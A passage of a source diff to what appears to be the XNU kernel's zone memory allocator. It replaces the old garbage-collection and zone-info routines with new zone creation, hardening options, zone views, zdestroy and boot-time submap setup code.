+       /*
+        * Finally, fixup properties based on security policies, boot-args, ...
+        */
+       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
+           z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) {
+               z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES;
        }
-
-       if (__probable(zstats != NULL)) {
-               /*
-                * The few vm zones used before zone_init() runs do not have
-                * per-cpu stats yet
-                */
-               zpercpu_get(zstats)->zs_mem_freed += elem_size;
+#if __LP64__
+       if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) &&
+           (flags & ZC_NOSEQUESTER) == 0 &&
+           z->z_submap_idx == Z_SUBMAP_IDX_GENERAL) {
+               z->z_va_sequester = true;
+       }
+#endif
+       /*
+        * Clear entire element for non data zones and upto zp_min_size for
+        * data zones.
+        */
+       if (z->z_submap_idx != Z_SUBMAP_IDX_BAG_OF_BYTES) {
+               z->z_free_zeroes = true;
+       } else if (size <= zp_min_size) {
+               z->z_free_zeroes = true;
        }
 
-       zfree_direct_locked(zone, elem, poison);
-
-       unlock_zone(zone);
-}
-
-void
-(zfree)(union zone_or_view zov, void *addr)
-{
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(!zone->percpu);
-       zfree_ext(zone, zstats, addr);
-}
-
-void
-zfree_percpu(union zone_or_view zov, void *addr)
-{
-       zone_t zone = zov.zov_view->zv_zone;
-       zone_stats_t zstats = zov.zov_view->zv_stats;
-       assert(zone->percpu);
-       zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr));
-}
-
-#pragma mark vm integration, MIG routines
-
-/*
- * Drops (i.e. frees) the elements in the all free pages queue of a zone.
- * Called by zone_gc() on each zone and when a zone is zdestroy()ed.
- */
-static void
-zone_drop_free_elements(zone_t z)
-{
-       const zone_addr_kind_t    kind = ZONE_ADDR_NATIVE;
-       unsigned int              total_freed_pages = 0;
-       struct zone_page_metadata *page_meta, *seq_meta;
-       vm_address_t              page_addr;
-       vm_size_t                 size_to_free;
-       vm_size_t                 free_count;
-       uint32_t                  page_count;
-
-       current_thread()->options |= TH_OPT_ZONE_PRIV;
-       lock_zone(z);
-
-       while (!zone_pva_is_null(z->pages_all_free)) {
+       if ((flags & ZC_CACHING) && !z->z_nocaching) {
                /*
-                * If any replenishment threads are running, defer to them,
-                * so that we don't deplete reserved zones.
+                * If zcache hasn't been initialized yet, remember our decision,
                 *
-                * The timing of the check isn't super important, as there are
-                * enough reserves to allow freeing an extra page_meta.
-                *
-                * Hence, we can check without grabbing the lock every time
-                * through the loop.  We do need the lock however to avoid
-                * missing a wakeup when we decide to block.
-                */
-               if (zone_replenish_active > 0) {
-                       lck_spin_lock(&zone_replenish_lock);
-                       if (zone_replenish_active > 0) {
-                               assert_wait(&zone_replenish_active, THREAD_UNINT);
-                               lck_spin_unlock(&zone_replenish_lock);
-                               unlock_zone(z);
-                               thread_block(THREAD_CONTINUE_NULL);
-                               lock_zone(z);
-                               continue;
-                       }
-                       lck_spin_unlock(&zone_replenish_lock);
-               }
-
-               page_meta = zone_pva_to_meta(z->pages_all_free, kind);
-               page_count = page_meta->zm_page_count;
-               free_count = zone_elem_count(z, ptoa(page_count), kind);
-
-               /*
-                * Don't drain zones with async refill to below the refill
-                * threshold, as they need some reserve to function properly.
+                * zone_enable_caching() will be called again by
+                * zcache_bootstrap(), while the system is still single
+                * threaded, to build the missing caches.
                 */
-               if (!z->destroyed && z->prio_refill_count &&
-                   (vm_size_t)(z->countfree - free_count) < z->prio_refill_count) {
-                       break;
-               }
-
-               zone_meta_queue_pop(z, &z->pages_all_free, kind, &page_addr);
-
-               if (os_sub_overflow(z->countfree, free_count, &z->countfree)) {
-                       zone_accounting_panic(z, "countfree wrap-around");
-               }
-               if (os_sub_overflow(z->countavail, free_count, &z->countavail)) {
-                       zone_accounting_panic(z, "countavail wrap-around");
-               }
-               if (os_sub_overflow(z->allfree_page_count, page_count,
-                   &z->allfree_page_count)) {
-                       zone_accounting_panic(z, "allfree_page_count wrap-around");
-               }
-               if (os_sub_overflow(z->page_count, page_count, &z->page_count)) {
-                       zone_accounting_panic(z, "page_count wrap-around");
-               }
-
-               os_atomic_sub(&zones_phys_page_count, page_count, relaxed);
-               os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed);
-
-               bzero(page_meta, sizeof(*page_meta) * page_count);
-               seq_meta = page_meta;
-               page_meta = NULL; /* page_meta fields are zeroed, prevent reuse */
-
-               unlock_zone(z);
-
-               /* Free the pages for metadata and account for them */
-               total_freed_pages += page_count;
-               size_to_free = ptoa(page_count);
-#if KASAN_ZALLOC
-               kasan_poison_range(page_addr, size_to_free, ASAN_VALID);
-#endif
-#if VM_MAX_TAG_ZONES
-               if (z->tags) {
-                       ztMemoryRemove(z, page_addr, size_to_free);
-               }
-#endif /* VM_MAX_TAG_ZONES */
-
-               if (z->va_sequester && z->alloc_pages == page_count) {
-                       kernel_memory_depopulate(submap_for_zone(z), page_addr,
-                           size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE);
+               if (__probable(zc_magazine_zone)) {
+                       zone_enable_caching(z);
                } else {
-                       kmem_free(submap_for_zone(z), page_addr, size_to_free);
-                       seq_meta = NULL;
+                       z->z_pcpu_cache =
+                           __zpcpu_mangle_for_boot(&zone_cache_startup[zid]);
                }
-               thread_yield_to_preemption();
-
-               lock_zone(z);
-
-               if (seq_meta) {
-                       zone_meta_queue_push(z, &z->pages_sequester, seq_meta, kind);
-                       z->sequester_page_count += page_count;
-               }
-       }
-       if (z->destroyed) {
-               assert(zone_pva_is_null(z->pages_all_free));
-               assert(z->allfree_page_count == 0);
-       }
-       unlock_zone(z);
-       current_thread()->options &= ~TH_OPT_ZONE_PRIV;
-
-#if DEBUG || DEVELOPMENT
-       if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) {
-               kprintf("zone_gc() of zone %s%s freed %lu elements, %d pages\n",
-                   zone_heap_name(z), z->z_name,
-                   (unsigned long)(ptoa(total_freed_pages) / z->pcpu_elem_size),
-                   total_freed_pages);
-       }
-#endif /* DEBUG || DEVELOPMENT */
-}
-
-/*     Zone garbage collection
- *
- *     zone_gc will walk through all the free elements in all the
- *     zones that are marked collectable looking for reclaimable
- *     pages.  zone_gc is called by consider_zone_gc when the system
- *     begins to run out of memory.
- *
- *     We should ensure that zone_gc never blocks.
- */
-void
-zone_gc(boolean_t consider_jetsams)
-{
-       if (consider_jetsams) {
-               kill_process_in_largest_zone();
-               /*
-                * If we do end up jetsamming something, we need to do a zone_gc so that
-                * we can reclaim free zone elements and update the zone map size.
-                * Fall through.
-                */
        }
 
-       lck_mtx_lock(&zone_gc_lock);
-
-#if DEBUG || DEVELOPMENT
-       if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) {
-               kprintf("zone_gc() starting...\n");
-       }
-#endif /* DEBUG || DEVELOPMENT */
-
-       zone_index_foreach(i) {
-               zone_t z = &zone_array[i];
-
-               if (!z->collectable) {
-                       continue;
-               }
-#if CONFIG_ZCACHE
-               if (zone_caching_enabled(z)) {
-                       zcache_drain_depot(z);
-               }
-#endif /* CONFIG_ZCACHE */
-               if (zone_pva_is_null(z->pages_all_free)) {
-                       continue;
+       if (zp_factor != 0 && !z->z_free_zeroes) {
+               if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) {
+                       zpercpu_foreach(zs, z->z_stats) {
+                               zs->zs_poison_seqno = zone_poison_count_init(z);
+                       }
+               } else {
+                       zone_stats_startup[zid].zs_poison_seqno =
+                           zone_poison_count_init(z);
                }
-
-               zone_drop_free_elements(z);
        }
 
-       lck_mtx_unlock(&zone_gc_lock);
-}
+       zone_lock(z);
+       z->z_self = z;
+       zone_unlock(z);
 
-/*
- *     consider_zone_gc:
- *
- *     Called by the pageout daemon when the system needs more free pages.
- */
+       return z;
+}
 
+__startup_func
 void
-consider_zone_gc(boolean_t consider_jetsams)
+zone_create_startup(struct zone_create_startup_spec *spec)
 {
-       /*
-        * One-time reclaim of kernel_map resources we allocated in
-        * early boot.
-        *
-        * Use atomic exchange in case multiple threads race into here.
-        */
-       vm_offset_t deallocate_kaddr;
-       if (kmapoff_kaddr != 0 &&
-           (deallocate_kaddr = os_atomic_xchg(&kmapoff_kaddr, 0, relaxed)) != 0) {
-               vm_deallocate(kernel_map, deallocate_kaddr, ptoa_64(kmapoff_pgcnt));
-       }
-
-       zone_gc(consider_jetsams);
+       *spec->z_var = zone_create_ext(spec->z_name, spec->z_size,
+           spec->z_flags, spec->z_zid, spec->z_setup);
 }
 
 /*
- * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls
- * requesting zone information.
- * Frees unused pages towards the end of the region, and zero'es out unused
- * space on the last page.
+ * The 4 first field of a zone_view and a zone alias, so that the zone_or_view_t
+ * union works. trust but verify.
  */
-static vm_map_copy_t
-create_vm_map_copy(
-       vm_offset_t             start_addr,
-       vm_size_t               total_size,
-       vm_size_t               used_size)
-{
-       kern_return_t   kr;
-       vm_offset_t             end_addr;
-       vm_size_t               free_size;
-       vm_map_copy_t   copy;
-
-       if (used_size != total_size) {
-               end_addr = start_addr + used_size;
-               free_size = total_size - (round_page(end_addr) - start_addr);
-
-               if (free_size >= PAGE_SIZE) {
-                       kmem_free(ipc_kernel_map,
-                           round_page(end_addr), free_size);
-               }
-               bzero((char *) end_addr, round_page(end_addr) - end_addr);
-       }
-
-       kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr,
-           (vm_map_size_t)used_size, TRUE, &copy);
-       assert(kr == KERN_SUCCESS);
-
-       return copy;
-}
+#define zalloc_check_zov_alias(f1, f2) \
+    static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2))
+zalloc_check_zov_alias(z_self, zv_zone);
+zalloc_check_zov_alias(z_stats, zv_stats);
+zalloc_check_zov_alias(z_name, zv_name);
+zalloc_check_zov_alias(z_views, zv_next);
+#undef zalloc_check_zov_alias
 
-static boolean_t
-get_zone_info(
-       zone_t                   z,
-       mach_zone_name_t        *zn,
-       mach_zone_info_t        *zi)
+__startup_func
+void
+zone_view_startup_init(struct zone_view_startup_spec *spec)
 {
-       struct zone zcopy;
+       struct kalloc_heap *heap = NULL;
+       zone_view_t zv = spec->zv_view;
+       zone_t z;
 
-       assert(z != ZONE_NULL);
-       lock_zone(z);
-       if (!z->z_self) {
-               unlock_zone(z);
-               return FALSE;
+       switch (spec->zv_heapid) {
+       case KHEAP_ID_DEFAULT:
+               heap = KHEAP_DEFAULT;
+               break;
+       case KHEAP_ID_DATA_BUFFERS:
+               heap = KHEAP_DATA_BUFFERS;
+               break;
+       case KHEAP_ID_KEXT:
+               heap = KHEAP_KEXT;
+               break;
+       default:
+               heap = NULL;
        }
-       zcopy = *z;
-       unlock_zone(z);
-
-       if (zn != NULL) {
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
-                   zone_heap_name(z), z->z_name);
 
-               /* assuming here the name data is static */
-               (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name,
-                   strlen(temp_zone_name) + 1);
+       if (heap) {
+               z = kalloc_heap_zone_for_size(heap, spec->zv_size);
+               assert(z);
+       } else {
+               z = spec->zv_zone;
+               assert(spec->zv_size <= zone_elem_size(z));
        }
 
-       if (zi != NULL) {
-               *zi = (mach_zone_info_t) {
-                       .mzi_count = zone_count_allocated(&zcopy),
-                       .mzi_cur_size = ptoa_64(zcopy.page_count),
-                       // max_size for zprint is now high-watermark of pages used
-                       .mzi_max_size = ptoa_64(zcopy.page_count_hwm),
-                       .mzi_elem_size = zcopy.pcpu_elem_size,
-                       .mzi_alloc_size = ptoa_64(zcopy.alloc_pages),
-                       .mzi_exhaustible = (uint64_t)zcopy.exhaustible,
-               };
-               zpercpu_foreach(zs, zcopy.z_stats) {
-                       zi->mzi_sum_size += zs->zs_mem_allocated;
-               }
-               if (zcopy.collectable) {
-                       SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable,
-                           ptoa_64(zcopy.allfree_page_count));
-                       SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE);
-               }
+       zv->zv_zone  = z;
+       zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats);
+       zv->zv_next  = z->z_views;
+       if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) {
+               /*
+                * count the raw view for zones not in a heap,
+                * kalloc_heap_init() already counts it for its members.
+                */
+               zone_view_count += 2;
+       } else {
+               zone_view_count += 1;
        }
-
-       return TRUE;
+       z->z_views = zv;
 }
 
-kern_return_t
-task_zone_info(
-       __unused task_t                                 task,
-       __unused mach_zone_name_array_t *namesp,
-       __unused mach_msg_type_number_t *namesCntp,
-       __unused task_zone_info_array_t *infop,
-       __unused mach_msg_type_number_t *infoCntp)
+zone_t
+zone_create(
+       const char             *name,
+       vm_size_t               size,
+       zone_create_flags_t     flags)
 {
-       return KERN_FAILURE;
+       return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL);
 }
 
-kern_return_t
-mach_zone_info(
-       host_priv_t             host,
-       mach_zone_name_array_t  *namesp,
-       mach_msg_type_number_t  *namesCntp,
-       mach_zone_info_array_t  *infop,
-       mach_msg_type_number_t  *infoCntp)
+zone_t
+zinit(
+       vm_size_t       size,           /* the size of an element */
+       vm_size_t       max,            /* maximum memory to use */
+       vm_size_t       alloc __unused, /* allocation size */
+       const char      *name)          /* a name for the zone */
 {
-       return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL);
+       zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE);
+       z->z_wired_max = zone_alloc_pages_for_nelems(z, max / size);
+       return z;
 }
 
-
-kern_return_t
-mach_memory_info(
-       host_priv_t             host,
-       mach_zone_name_array_t  *namesp,
-       mach_msg_type_number_t  *namesCntp,
-       mach_zone_info_array_t  *infop,
-       mach_msg_type_number_t  *infoCntp,
-       mach_memory_info_array_t *memoryInfop,
-       mach_msg_type_number_t   *memoryInfoCntp)
+void
+zdestroy(zone_t z)
 {
-       mach_zone_name_t        *names;
-       vm_offset_t             names_addr;
-       vm_size_t               names_size;
-
-       mach_zone_info_t        *info;
-       vm_offset_t             info_addr;
-       vm_size_t               info_size;
+       unsigned int zindex = zone_index(z);
 
-       mach_memory_info_t      *memory_info;
-       vm_offset_t             memory_info_addr;
-       vm_size_t               memory_info_size;
-       vm_size_t               memory_info_vmsize;
-       unsigned int            num_info;
+       current_thread()->options |= TH_OPT_ZONE_PRIV;
+       lck_mtx_lock(&zone_gc_lock);
 
-       unsigned int            max_zones, used_zones, i;
-       mach_zone_name_t        *zn;
-       mach_zone_info_t        *zi;
-       kern_return_t           kr;
+       zone_reclaim(z, ZONE_RECLAIM_DESTROY);
 
-       uint64_t                zones_collectable_bytes = 0;
+       lck_mtx_unlock(&zone_gc_lock);
+       current_thread()->options &= ~TH_OPT_ZONE_PRIV;
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
-#if CONFIG_DEBUGGER_FOR_ZONE_INFO
-       if (!PE_i_can_has_debugger(NULL)) {
-               return KERN_INVALID_HOST;
+#if CONFIG_GZALLOC
+       if (__improbable(z->gzalloc_tracked)) {
+               /* If the zone is gzalloc managed dump all the elements in the free cache */
+               gzalloc_empty_free_cache(z);
        }
 #endif
 
-       /*
-        *      We assume that zones aren't freed once allocated.
-        *      We won't pick up any zones that are allocated later.
-        */
+       zone_lock(z);
 
-       max_zones = os_atomic_load(&num_zones, relaxed);
+       while (!zone_pva_is_null(z->z_pageq_va)) {
+               struct zone_page_metadata *meta;
+               vm_offset_t free_addr;
 
-       names_size = round_page(max_zones * sizeof *names);
-       kr = kmem_alloc_pageable(ipc_kernel_map,
-           &names_addr, names_size, VM_KERN_MEMORY_IPC);
-       if (kr != KERN_SUCCESS) {
-               return kr;
+               zone_counter_sub(z, z_va_cur, z->z_percpu ? 1 : z->z_chunk_pages);
+               meta = zone_meta_queue_pop_native(z, &z->z_pageq_va, &free_addr);
+               assert(meta->zm_chunk_len <= ZM_CHUNK_LEN_MAX);
+               bzero(meta, sizeof(*meta) * z->z_chunk_pages);
+               zone_unlock(z);
+               kmem_free(zone_submap(z), free_addr, ptoa(z->z_chunk_pages));
+               zone_lock(z);
        }
-       names = (mach_zone_name_t *) names_addr;
 
-       info_size = round_page(max_zones * sizeof *info);
-       kr = kmem_alloc_pageable(ipc_kernel_map,
-           &info_addr, info_size, VM_KERN_MEMORY_IPC);
-       if (kr != KERN_SUCCESS) {
-               kmem_free(ipc_kernel_map,
-                   names_addr, names_size);
-               return kr;
+#if !KASAN_ZALLOC
+       /* Assert that all counts are zero */
+       if (z->z_elems_avail || z->z_elems_free ||
+           zone_size_wired(z) || z->z_va_cur) {
+               panic("zdestroy: Zone %s%s isn't empty at zdestroy() time",
+                   zone_heap_name(z), z->z_name);
        }
-       info = (mach_zone_info_t *) info_addr;
 
-       zn = &names[0];
-       zi = &info[0];
+       /* consistency check: make sure everything is indeed empty */
+       assert(zone_pva_is_null(z->z_pageq_empty));
+       assert(zone_pva_is_null(z->z_pageq_partial));
+       assert(zone_pva_is_null(z->z_pageq_full));
+       assert(zone_pva_is_null(z->z_pageq_va));
+#endif
 
-       used_zones = max_zones;
-       for (i = 0; i < max_zones; i++) {
-               if (!get_zone_info(&(zone_array[i]), zn, zi)) {
-                       used_zones--;
-                       continue;
-               }
-               zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable);
-               zn++;
-               zi++;
-       }
+       zone_unlock(z);
 
-       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names);
-       *namesCntp = used_zones;
+       simple_lock(&all_zones_lock, &zone_locks_grp);
 
-       *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info);
-       *infoCntp = used_zones;
+       assert(!bitmap_test(zone_destroyed_bitmap, zindex));
+       /* Mark the zone as empty in the bitmap */
+       bitmap_set(zone_destroyed_bitmap, zindex);
+       num_zones_in_use--;
+       assert(num_zones_in_use > 0);
 
-       num_info = 0;
-       memory_info_addr = 0;
+       simple_unlock(&all_zones_lock);
+}
 
-       if (memoryInfop && memoryInfoCntp) {
-               vm_map_copy_t           copy;
-               num_info = vm_page_diagnose_estimate();
-               memory_info_size = num_info * sizeof(*memory_info);
-               memory_info_vmsize = round_page(memory_info_size);
-               kr = kmem_alloc_pageable(ipc_kernel_map,
-                   &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC);
-               if (kr != KERN_SUCCESS) {
-                       return kr;
-               }
+#endif /* !ZALLOC_TEST */
+#pragma mark zalloc module init
+#if !ZALLOC_TEST
 
-               kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize,
-                   VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
-               assert(kr == KERN_SUCCESS);
+/*
+ *     Initialize the "zone of zones" which uses fixed memory allocated
+ *     earlier in memory initialization.  zone_bootstrap is called
+ *     before zone_init.
+ */
+__startup_func
+void
+zone_bootstrap(void)
+{
+       /* Validate struct zone_packed_virtual_address expectations */
+       static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1");
+       if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) {
+               panic("zone_pva_t can't pack a kernel page address in 31 bits");
+       }
 
-               memory_info = (mach_memory_info_t *) memory_info_addr;
-               vm_page_diagnose(memory_info, num_info, zones_collectable_bytes);
+       zpercpu_early_count = ml_early_cpu_max_number() + 1;
 
-               kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE);
-               assert(kr == KERN_SUCCESS);
+       /* Set up zone element poisoning */
+       zp_bootstrap();
 
-               kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr,
-                   (vm_map_size_t)memory_info_size, TRUE, &copy);
-               assert(kr == KERN_SUCCESS);
+       /*
+        * the KASAN quarantine for kalloc doesn't understand heaps
+        * and trips the heap confusion panics. At the end of the day,
+        * all these security measures are double duty with KASAN.
+        *
+        * On 32bit kernels, these protections are just too expensive.
+        */
+#if !defined(__LP64__) || KASAN_ZALLOC
+       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER;
+       zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA;
+       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC;
+#endif
 
-               *memoryInfop = (mach_memory_info_t *) copy;
-               *memoryInfoCntp = num_info;
-       }
+       thread_call_setup_with_options(&zone_expand_callout,
+           zone_expand_async, NULL, THREAD_CALL_PRIORITY_HIGH,
+           THREAD_CALL_OPTIONS_ONCE);
+
+       thread_call_setup_with_options(&zone_defrag_callout,
+           zone_defrag_async, NULL, THREAD_CALL_PRIORITY_USER,
+           THREAD_CALL_OPTIONS_ONCE);
+}
+
+#if __LP64__
+#if ARM_LARGE_MEMORY || __x86_64__
+#define ZONE_MAP_VIRTUAL_SIZE_LP64      (128ULL * 1024ULL * 1024 * 1024)
+#else
+#define ZONE_MAP_VIRTUAL_SIZE_LP64      (32ULL * 1024ULL * 1024 * 1024)
+#endif
+#endif /* __LP64__ */
 
-       return KERN_SUCCESS;
-}
+#define ZONE_GUARD_SIZE                 (64UL << 10)
 
-kern_return_t
-mach_zone_info_for_zone(
-       host_priv_t                     host,
-       mach_zone_name_t        name,
-       mach_zone_info_t        *infop)
+#if __LP64__
+static inline vm_offset_t
+zone_restricted_va_max(void)
 {
-       zone_t zone_ptr;
+       vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR);
+       vm_offset_t vm_page_max    = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR);
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
-#if CONFIG_DEBUGGER_FOR_ZONE_INFO
-       if (!PE_i_can_has_debugger(NULL)) {
-               return KERN_INVALID_HOST;
-       }
+       return trunc_page(MIN(compressor_max, vm_page_max));
+}
 #endif
 
-       if (infop == NULL) {
-               return KERN_INVALID_ARGUMENT;
+__startup_func
+static void
+zone_tunables_fixup(void)
+{
+       if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) {
+               zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT;
        }
+       if (zc_magazine_size > PAGE_SIZE / ZONE_MIN_ELEM_SIZE) {
+               zc_magazine_size = (uint16_t)(PAGE_SIZE / ZONE_MIN_ELEM_SIZE);
+       }
+}
+STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup);
 
-       zone_ptr = ZONE_NULL;
-       zone_index_foreach(i) {
-               zone_t z = &(zone_array[i]);
-               assert(z != ZONE_NULL);
-
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
-                   zone_heap_name(z), z->z_name);
+__startup_func
+static vm_size_t
+zone_phys_size_max(void)
+{
+       vm_size_t zsize;
+       vm_size_t zsizearg;
 
-               /* Find the requested zone by name */
-               if (track_this_zone(temp_zone_name, name.mzn_name)) {
-                       zone_ptr = z;
-                       break;
-               }
+       if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) {
+               zsize = zsizearg * (1024ULL * 1024);
+       } else {
+               /* Set target zone size as 1/4 of physical memory */
+               zsize = (vm_size_t)(sane_size >> 2);
+#if defined(__LP64__)
+               zsize += zsize >> 1;
+#endif /* __LP64__ */
        }
 
-       /* No zones found with the requested zone name */
-       if (zone_ptr == ZONE_NULL) {
-               return KERN_INVALID_ARGUMENT;
+       if (zsize < CONFIG_ZONE_MAP_MIN) {
+               zsize = CONFIG_ZONE_MAP_MIN;   /* Clamp to min */
        }
-
-       if (get_zone_info(zone_ptr, NULL, infop)) {
-               return KERN_SUCCESS;
+       if (zsize > sane_size >> 1) {
+               zsize = (vm_size_t)(sane_size >> 1); /* Clamp to half of RAM max */
        }
-       return KERN_FAILURE;
+       if (zsizearg == 0 && zsize > ZONE_MAP_MAX) {
+               /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */
+               printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n",
+                   (uintptr_t)zsize, (uintptr_t)ZONE_MAP_MAX);
+               zsize = ZONE_MAP_MAX;
+       }
+
+       return (vm_size_t)trunc_page(zsize);
 }
 
-kern_return_t
-mach_zone_info_for_largest_zone(
-       host_priv_t                     host,
-       mach_zone_name_t        *namep,
-       mach_zone_info_t        *infop)
+__options_decl(zone_init_allocate_flags_t, unsigned, {
+       ZIA_NONE      = 0x00000000,
+       ZIA_REPLACE   = 0x00000001, /* replace a previous non permanent range */
+       ZIA_RANDOM    = 0x00000002, /* place at a random address              */
+       ZIA_PERMANENT = 0x00000004, /* permanent allocation                   */
+       ZIA_GUARD     = 0x00000008, /* will be used as a guard                */
+});
+
+__startup_func
+static struct zone_map_range
+zone_init_allocate_va(vm_map_address_t addr, vm_size_t size,
+    zone_init_allocate_flags_t flags)
 {
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
+       vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       int vm_alloc_flags = 0;
+       struct zone_map_range r;
+       kern_return_t kr;
+
+       if (flags & ZIA_REPLACE) {
+               vm_alloc_flags |= VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE;
+       } else {
+               vm_alloc_flags |= VM_FLAGS_ANYWHERE;
        }
-#if CONFIG_DEBUGGER_FOR_ZONE_INFO
-       if (!PE_i_can_has_debugger(NULL)) {
-               return KERN_INVALID_HOST;
+       if (flags & ZIA_RANDOM) {
+               vm_alloc_flags |= VM_FLAGS_RANDOM_ADDR;
        }
-#endif
-
-       if (namep == NULL || infop == NULL) {
-               return KERN_INVALID_ARGUMENT;
+       if (flags & ZIA_PERMANENT) {
+               vmk_flags.vmkf_permanent = true;
        }
 
-       if (get_zone_info(zone_find_largest(), namep, infop)) {
-               return KERN_SUCCESS;
-       }
-       return KERN_FAILURE;
-}
+       vm_object_reference(kernel_object);
 
-uint64_t
-get_zones_collectable_bytes(void)
-{
-       uint64_t zones_collectable_bytes = 0;
-       mach_zone_info_t zi;
+       kr = vm_map_enter(kernel_map, &addr, size, 0,
+           vm_alloc_flags, vmk_flags, VM_KERN_MEMORY_ZONE,
+           kernel_object, 0, FALSE,
+           (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT,
+           (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT,
+           VM_INHERIT_NONE);
 
-       zone_index_foreach(i) {
-               if (get_zone_info(&zone_array[i], NULL, &zi)) {
-                       zones_collectable_bytes +=
-                           GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable);
-               }
+       if (KERN_SUCCESS != kr) {
+               panic("vm_map_enter(0x%zx) failed: %d", (size_t)size, kr);
        }
 
-       return zones_collectable_bytes;
+       r.min_address = (vm_offset_t)addr;
+       r.max_address = (vm_offset_t)addr + size;
+       return r;
 }
 
-kern_return_t
-mach_zone_get_zlog_zones(
-       host_priv_t                             host,
-       mach_zone_name_array_t  *namesp,
-       mach_msg_type_number_t  *namesCntp)
+__startup_func
+static void
+zone_submap_init(
+       vm_offset_t *submap_min,
+       unsigned    idx,
+       uint64_t    zone_sub_map_numer,
+       uint64_t    *remaining_denom,
+       vm_offset_t *remaining_size,
+       vm_size_t   guard_size)
 {
-#if ZONE_ENABLE_LOGGING
-       unsigned int max_zones, logged_zones, i;
+       vm_offset_t submap_start, submap_end;
+       vm_size_t submap_size;
+       vm_map_t  submap;
        kern_return_t kr;
-       zone_t zone_ptr;
-       mach_zone_name_t *names;
-       vm_offset_t names_addr;
-       vm_size_t names_size;
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
+       submap_size = trunc_page(zone_sub_map_numer * *remaining_size /
+           *remaining_denom);
+       submap_start = *submap_min;
+       submap_end = submap_start + submap_size;
 
-       if (namesp == NULL || namesCntp == NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
+#if defined(__LP64__)
+       if (idx == Z_SUBMAP_IDX_VA_RESTRICTED) {
+               vm_offset_t restricted_va_max = zone_restricted_va_max();
+               if (submap_end > restricted_va_max) {
+#if DEBUG || DEVELOPMENT
+                       printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx,
+                           (size_t)(restricted_va_max - submap_start) >> 20,
+                           (size_t)submap_size >> 20);
+#endif /* DEBUG || DEVELOPMENT */
+                       guard_size += submap_end - restricted_va_max;
+                       *remaining_size -= submap_end - restricted_va_max;
+                       submap_end  = restricted_va_max;
+                       submap_size = restricted_va_max - submap_start;
+               }
 
-       max_zones = os_atomic_load(&num_zones, relaxed);
+               vm_packing_verify_range("vm_compressor",
+                   submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR));
+               vm_packing_verify_range("vm_page",
+                   submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR));
+       }
+#endif /* defined(__LP64__) */
 
-       names_size = round_page(max_zones * sizeof *names);
-       kr = kmem_alloc_pageable(ipc_kernel_map,
-           &names_addr, names_size, VM_KERN_MEMORY_IPC);
+       vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       vmk_flags.vmkf_permanent = TRUE;
